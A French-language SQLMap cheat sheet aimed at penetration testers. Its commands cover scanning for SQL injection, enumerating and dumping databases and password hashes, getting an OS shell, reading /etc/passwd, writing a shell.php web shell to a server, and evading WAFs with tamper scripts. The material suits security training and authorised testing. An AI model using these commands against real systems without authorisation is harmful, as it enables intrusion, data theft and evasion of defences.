Aller au contenu

SQLMap

Objectif : SQLMap est un outil open-source d'audit de sécurité et de test de pénétration qui automatise le processus de détection et d'exploitation des vulnérabilités d'injection SQL, permettant ainsi de prendre le contrôle des serveurs de bases de données.

Source : https://github.com/sqlmapproject/sqlmap | http://sqlmap.org/

OPSEC : SQLMap peut générer un trafic très important et suspect. Son utilisation est facilement détectable par les WAFs (Web Application Firewalls), IDS/IPS et les équipes de sécurité si des précautions (tampers, délais, user-agent aléatoire) ne sont pas prises.


🎯 Ciblage et Scan de Base

Spécifier une URL cible (paramètre GET)

sqlmap -u "[http://exemple.com/produits?id=1](http://exemple.com/produits?id=1)"
  • Contexte : Lance un scan de base sur l'URL fournie, testant les paramètres GET (ici id).
  • Usage : Point d'entrée le plus simple pour tester une URL.

Spécifier une URL cible avec des données POST

sqlmap -u "[http://exemple.com/login](http://exemple.com/login)" --data="username=admin&password=pass"
  • Contexte : Teste les paramètres envoyés dans le corps d'une requête POST.
  • Usage : Pour les formulaires de connexion, de recherche, etc.

Analyser une requête depuis un fichier (Burp Suite, ZAP)

sqlmap -r request.txt
  • Contexte : Lit une requête HTTP complète (y compris les en-têtes, cookies, méthode POST/GET) depuis un fichier texte.
  • Usage : Très pratique pour rejouer et tester des requêtes complexes interceptées avec un proxy comme Burp Suite ou ZAP.

Spécifier un paramètre spécifique à tester

sqlmap -u "[http://exemple.com/produits?id=1&cat=2](http://exemple.com/produits?id=1&cat=2)" -p id
  • Contexte : Ne teste que le paramètre id pour l'injection SQL, ignorant les autres (cat ici).
  • Usage : Accélérer le scan en se concentrant sur un paramètre jugé potentiellement vulnérable.
sqlmap -u "[http://exemple.com/profil?id=1](http://exemple.com/profil?id=1)" --cookie="sessionid=abcdef12345"
  • Contexte : Inclut le cookie spécifié dans toutes les requêtes, permettant de tester des pages nécessitant une authentification.
  • Usage : Essentiel pour auditer des zones authentifiées d'une application web.

⚙️ Ajustement du Scan (Niveau et Risque)

Augmenter le niveau de test (plus de payloads/types d'injection)

sqlmap -r request.txt --level=5
  • Contexte : Augmente la profondeur des tests. level va de 1 (défaut) à 5 (maximum). Un niveau plus élevé teste plus de types d'injections (ex: time-based blind, injections dans les en-têtes comme User-Agent, Referer).
  • Usage : Pour des scans plus exhaustifs, mais plus lents et potentiellement plus bruyants.

Augmenter le risque (tests potentiellement plus dangereux)

sqlmap -r request.txt --risk=3
  • Contexte : Augmente l'agressivité des tests. risk va de 1 (défaut) à 3 (maximum). Un risque plus élevé utilise des payloads qui pourraient potentiellement modifier des données ou causer des erreurs (ex: injections SQL lourdes).
  • Usage : À utiliser avec prudence, surtout sur des environnements de production.

[!Astuce]
Combiner --level=5 --risk=3 permet le scan le plus complet possible, mais aussi le plus lent et le plus risqué/bruyant.


🔎 Énumération de la Base de Données

Une fois qu'une injection est confirmée, ces commandes permettent d'explorer la structure et le contenu de la base de données.

Lister les bases de données disponibles

sqlmap -r request.txt --dbs

Lister les tables d'une base de données spécifique

sqlmap -r request.txt -D <nom_db> --tables

Lister les colonnes d'une table spécifique

sqlmap -r request.txt -D <nom_db> -T <nom_table> --columns

Obtenir l'utilisateur actuel de la base de données

sqlmap -r request.txt --current-user

Obtenir le nom de la base de données actuelle

sqlmap -r request.txt --current-db

Vérifier si l'utilisateur actuel est administrateur (DBA)

sqlmap -r request.txt --is-dba

Tenter de dumper les hashes des mots de passe (si possible)

sqlmap -r request.txt --passwords
  • Prérequis : Nécessite souvent des privilèges élevés et dépend du type de SGBD.

💾 Dump des Données

Dumper le contenu d'une table

sqlmap -r request.txt -D <nom_db> -T <nom_table> --dump

Dumper des colonnes spécifiques d'une table

sqlmap -r request.txt -D <nom_db> -T <nom_table> -C <col1,col2> --dump

Dumper toutes les tables de toutes les bases de données

sqlmap -r request.txt --dump-all
  • Usage : Très long et bruyant, à utiliser avec parcimonie.

💥 Exploitation (Accès Système)

[!Attention]
Ces actions sont très intrusives et nécessitent généralement que l'utilisateur de la base de données ait des privilèges très élevés (DBA) et que le SGBD soit configuré de manière permissive.

Obtenir un shell interactif sur le système d'exploitation via la base de données

sqlmap -r request.txt --os-shell
  • Contexte : Tente d'uploader un petit shell (via différentes techniques selon le SGBD : xp_cmdshell sur MSSQL, UDF sur MySQL/PostgreSQL, etc.) et d'obtenir une invite de commande interactive sur le serveur hébergeant la base de données.
  • Prérequis : Privilèges DBA, SGBD et OS compatibles.

Exécuter une commande OS unique

sqlmap -r request.txt --os-cmd="<commande>"
# Exemple: sqlmap -r req.txt --os-cmd="whoami"

Obtenir un shell SQL interactif

sqlmap -r request.txt --sql-shell
  • Contexte : Permet d'exécuter des requêtes SQL arbitraires directement sur la base de données.
  • Usage : Utile pour une exploration manuelle ou des opérations non prévues par les options de dump standard.

Lire un fichier sur le serveur

sqlmap -r request.txt --file-read "<chemin_fichier_distant>"
# Exemple: sqlmap -r req.txt --file-read "/etc/passwd"
  • Prérequis : Privilèges de lecture de fichiers pour l'utilisateur de la base de données (ex: FILE sur MySQL, pg_read_server_files sur PostgreSQL).

Écrire un fichier local sur le serveur

sqlmap -r request.txt --file-write "<fichier_local>" --file-dest "<chemin_destination_distant>"
# Exemple: sqlmap -r req.txt --file-write "shell.php" --file-dest "/var/www/html/uploads/shell.php"
  • Prérequis : Privilèges d'écriture de fichiers pour l'utilisateur de la base de données.

🛠️ Techniques et Tuning

Forcer une technique d'injection spécifique

1
2
3
4
5
6
7
8
sqlmap -r request.txt --technique=<lettre>
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Q: Inline queries (rare)
# Exemple: sqlmap -r req.txt --technique=U # Force UNION
  • Usage : Utile si on sait quel type d'injection fonctionne ou pour accélérer le scan en évitant des techniques inutiles.

Spécifier le SGBD cible

sqlmap -r request.txt --dbms=<sgbd>
# Exemples: --dbms=mysql, --dbms=mssql, --dbms=postgresql, --dbms=oracle
  • Usage : Accélère le scan en ne testant que les payloads spécifiques au SGBD indiqué.

Augmenter le nombre de threads (parallélisation)

sqlmap -r request.txt --threads=10
  • Usage : Accélère le scan, mais augmente la charge sur le serveur cible et le risque de détection.

Mode non interactif (répond 'oui' par défaut)

sqlmap -r request.txt --batch
  • Usage : Utile pour les scans automatisés ou longs où l'on ne souhaite pas répondre manuellement aux questions de SQLMap.

Utiliser un User-Agent aléatoire

sqlmap -r request.txt --random-agent
  • Usage : Tente de masquer l'empreinte de SQLMap en utilisant des User-Agents variés.

🛡️ Contournement de WAF (Web Application Firewall)

Utiliser des scripts de manipulation (tampers)

sqlmap -r request.txt --tamper=<script1,script2,...>
  • Contexte : Les tampers modifient les payloads SQL envoyés par SQLMap pour tenter de contourner les règles de détection des WAFs.
  • Usage : Essentiel lorsque l'application est protégée par un WAF. Il faut souvent tester plusieurs combinaisons.
  • Exemples de tampers courants :
    • space2comment : Remplace les espaces par /**/.
    • base64encode : Encode le payload en Base64.
    • chardoubleencode : Double encodage URL des caractères.
    • between : Remplace > par NOT BETWEEN 0 AND.
    • randomcase : Change la casse des mots-clés SQL (ex: SELECT -> SeLeCt).
  • Lister les tampers disponibles : sqlmap --list-tampers

Ajouter un préfixe/suffixe aux payloads

sqlmap -r request.txt --prefix="')" --suffix="-- -"
  • Contexte : Ajoute des caractères avant (prefix) ou après (suffix) le payload injecté.
  • Usage : Utile pour fermer correctement des guillemets ou des parenthèses dans la requête SQL originale, ou pour commenter la fin de la requête.

Réinitialiser la session SQLMap (vider le cache)

sqlmap -r request.txt --flush-session
  • Contexte : SQLMap sauvegarde les résultats et les informations de session pour éviter de refaire les mêmes tests.
  • Usage : Forcer SQLMap à recommencer les tests depuis le début pour une cible donnée, utile si la configuration a changé ou si on veut essayer des options différentes.